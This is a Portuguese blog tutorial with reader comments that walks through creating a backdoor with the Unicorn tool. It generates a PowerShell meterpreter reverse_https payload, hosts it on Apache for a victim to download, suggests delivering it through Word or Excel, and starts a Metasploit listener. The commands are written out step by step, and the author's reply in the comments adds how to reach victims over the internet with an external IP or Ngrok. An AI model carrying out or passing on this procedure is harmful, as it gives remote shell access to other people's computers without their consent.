Backdoor com Unicorn

Publicado por Igor Matsunaga em

Criando o Backdoor

Para criar nosso backdoor usaremos uma incrível ferramenta desenvolvida pela trustedsec nomeada de Unicorn.

O Magic Unicorn é uma ferramenta simples para usar um ataque de downgrade do PowerShell e injetar o shellcode diretamente na memória. Baseado nos ataques de powershell de Matthew Graeber e na técnica de desvio de powershell apresentada por David Kennedy (TrustedSec) e Josh Kelly no Defcon 18.

Download da Ferramenta Unicorn

Abra um terminal e digite o comando abaixo:

# git clone https://github.com/trustedsec/unicorn.git

Navegue até a pasta onde foi salvo o arquivo:

# cd unicorn\

Digite o comando abaixo para listar os arquivos na pasta.

# ls

Utilizando o Unicorn

Execute o script unicorn.py

# python unicorn.py ou ./unicorn.py

Vários exemplos são mostrados na imagem acima, mas para realizar o nosso ataque utilizaremos a opção meterpreter. Mas antes caso desconheça seu IP utilize o comando.

# ifconfig

Agora que confirmamos nosso IP, utilizaremos a sintaxe a seguir. python unicorn.py <tipo de conexão> <IP> <Porta>

 # python unicorn.py windows/meterpreter/reverse_https 10.0.2.15 4444

Foram gerados 2 arquivos, powershell_attack e unicon.rc. No arquivo de texto você encontra todo o código necessário para injetar o ataque na memória. O interessante é utilizar algum software que suporte injeção de comandos remotos de algum tipo, como o excel/ word, existe uma gama enorme que possa ser utilizada. O unicorn.rc ira configurar o metasploit para ativar o nosso ouvinte.

Se vê também algumas instruções de uso.

logoNSW

Iniciando o Apache

Os arquivos foram criados dentro da pasta do unicorn.

Ainda dentro da pasta do unicorn, moveremos o arquivo powershell_attack.txt para nosso servidor apache com o comando:

# mv powershell_attack.txt /var/www/html

Realizado este procedimento podemos iniciar o apache com o comando:

# service apache2 start

Iniciando o Ouvinte

O Metasploit usa o PostgreSQL como banco de dados, portanto precisamos o inicia-lo primeiro com o comando:

# service postgresql start

O proximo passa agora será inicializa-lo no Metasploit com o comando.

# msfdb init

Agora que o serviço PostgreSQL está em execução é o banco de dados foi inicializado, iremos utilizar o unicorn.rc com o comando:

# msfconsole -r unicorn.rc

O processo está pronto e aguardando a conexão.

Criação do backdoor e criação do ouvinte.

Que a segurança esteja com você!!!

[products limit=”3″ columns=”4″ orderby=”date” order=”DESC” ids=”241,239,235″]

Igor Matsunaga

Diretor Técnico da NSWorld, entusiasta da área hacking, desenvolvedor hacker ético, formado em Segurança da Informação.

2 comentários

vitor · agosto 19, 2021 às 5:46 pm

isto é wan?
subir um backdoor no apache me garante acesso ao aparelho infectado de qlqr lugar? mesmo sem estar em rede lan?

    Igor Matsunaga · agosto 22, 2021 às 9:45 pm

    Não, é uma ferramenta utilizada para facilitar a criação de um Backdoor. No Apache fica armazenado o backdoor, para que uma vitima possa realizar o download do arquivo malicioso. Para que o ataque funcione em rede externa é necessário utilizar um IP externo com uma porta aberta disponível ou utilizar de alguma ferramenta como o Ngrok por exemplo.

Deixe um comentário

Avatar placeholder

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *